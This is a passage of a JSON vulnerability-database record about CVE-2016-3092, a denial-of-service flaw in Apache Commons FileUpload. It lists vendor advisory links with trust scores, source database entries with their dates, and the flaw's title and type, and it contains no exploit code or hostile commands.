"url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3092"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3092"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3092"
},
{
"trust": 0.7,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2016-3092"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324759"
},
{
"trust": 0.3,
"url": "http://www.apache.org/"
},
{
"trust": 0.3,
"url": "http://tomcat.apache.org/"
},
{
"trust": 0.3,
"url": "http://commons.apache.org/proper/commons-fileupload//"
},
{
"trust": 0.3,
"url": "http://mail-archives.apache.org/mod_mbox/www-announce/201606.mbox/%3c45a20804-abff-4fed-a297-69ac95ab9a3f@apache.org%3e"
},
{
"trust": 0.3,
"url": "https://jenkins.io/security/advisory/2017-10-11/"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05204371"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05289840"
},
{
"trust": 0.3,
"url": "http://tomcat.apache.org/security-7.html#fixed_in_apache_tomcat_7.0.70"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021649"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986641"
},
{
"trust": 0.3,
"url": "https://www-01.ibm.com/support/docview.wss?uid=swg21990830"
},
{
"trust": 0.3,
"url": "https://www-01.ibm.com/support/docview.wss?uid=swg21992916"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009566"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009571"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987864"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988198"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988279"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988564"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988584"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988585"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988586"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989359"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990120"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990236"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990262"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990386"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990394"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990424"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990451"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990527"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990884"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991786"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991837"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991866"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992457"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993043"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993879"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995043"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995382"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995611"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995686"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995793"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995892"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0763"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0706"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0714"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5351"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/6.4/index.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5345"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5346"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-8745"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5174"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1240"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-0714"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-0706"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2015-5351"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-0763"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2016:2069"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/./dsa-3611"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/3027-1/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49238"
},
{
"trust": 0.1,
"url": "http://www.hpe.com/support/security_bulletin_archive"
},
{
"trust": 0.1,
"url": "https://www.hpe.com/info/report-security-vulnerability"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-5388"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
},
{
"trust": 0.1,
"url": "https://h20392.www2.hpe.com/portal/swdepot/displayproductinfo.do?productnumb"
},
{
"trust": 0.1,
"url": "http://www.hpe.com/support/subscriber_choice"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5651"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-5650"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-8745"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5345"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5346"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-5647"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5650"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5174"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-5651"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5351"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5647"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0706"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1240"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5648"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0714"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-5648"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3092"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0763"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-8735"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-6325"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-6796"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/solutions/2435491"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-6325"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-8735"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1240"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-8745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-6794"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-5018"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-6797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-6796"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-6797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-6816"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0762"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-5018"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/3/html-single/3.1_release_notes/index.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/vulnerabilities/httpoxy"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-6816"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=webserver\u0026version=3.1.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-0762"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-6794"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.3_release_notes/index.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-5174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-5345"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-5346"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3092"
},
{
"db": "BID",
"id": "91453"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"db": "PACKETSTORM",
"id": "139722"
},
{
"db": "PACKETSTORM",
"id": "139166"
},
{
"db": "PACKETSTORM",
"id": "142561"
},
{
"db": "PACKETSTORM",
"id": "139162"
},
{
"db": "PACKETSTORM",
"id": "141513"
},
{
"db": "PACKETSTORM",
"id": "139165"
},
{
"db": "PACKETSTORM",
"id": "139536"
},
{
"db": "PACKETSTORM",
"id": "137727"
},
{
"db": "PACKETSTORM",
"id": "139771"
},
{
"db": "PACKETSTORM",
"id": "139163"
},
{
"db": "NVD",
"id": "CVE-2016-3092"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-3092"
},
{
"db": "BID",
"id": "91453"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"db": "PACKETSTORM",
"id": "139722"
},
{
"db": "PACKETSTORM",
"id": "139166"
},
{
"db": "PACKETSTORM",
"id": "142561"
},
{
"db": "PACKETSTORM",
"id": "139162"
},
{
"db": "PACKETSTORM",
"id": "141513"
},
{
"db": "PACKETSTORM",
"id": "139165"
},
{
"db": "PACKETSTORM",
"id": "139536"
},
{
"db": "PACKETSTORM",
"id": "137727"
},
{
"db": "PACKETSTORM",
"id": "139771"
},
{
"db": "PACKETSTORM",
"id": "139163"
},
{
"db": "NVD",
"id": "CVE-2016-3092"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-04T00:00:00",
"db": "VULMON",
"id": "CVE-2016-3092"
},
{
"date": "2016-06-21T00:00:00",
"db": "BID",
"id": "91453"
},
{
"date": "2016-06-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"date": "2016-11-15T00:43:21",
"db": "PACKETSTORM",
"id": "139722"
},
{
"date": "2016-10-18T13:58:33",
"db": "PACKETSTORM",
"id": "139166"
},
{
"date": "2017-05-18T04:17:44",
"db": "PACKETSTORM",
"id": "142561"
},
{
"date": "2016-10-18T13:57:53",
"db": "PACKETSTORM",
"id": "139162"
},
{
"date": "2017-03-08T00:57:19",
"db": "PACKETSTORM",
"id": "141513"
},
{
"date": "2016-10-18T13:58:26",
"db": "PACKETSTORM",
"id": "139165"
},
{
"date": "2016-11-04T20:09:39",
"db": "PACKETSTORM",
"id": "139536"
},
{
"date": "2016-06-30T16:09:38",
"db": "PACKETSTORM",
"id": "137727"
},
{
"date": "2016-11-17T23:52:54",
"db": "PACKETSTORM",
"id": "139771"
},
{
"date": "2016-10-18T13:58:05",
"db": "PACKETSTORM",
"id": "139163"
},
{
"date": "2016-07-04T22:59:04.303000",
"db": "NVD",
"id": "CVE-2016-3092"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-12-08T00:00:00",
"db": "VULMON",
"id": "CVE-2016-3092"
},
{
"date": "2019-04-17T07:00:00",
"db": "BID",
"id": "91453"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"date": "2024-11-21T02:49:20.870000",
"db": "NVD",
"id": "CVE-2016-3092"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "91453"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Commons FileUpload vulnerable to denial-of-service (DoS)",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "91453"
}
],
"trust": 0.3
}
}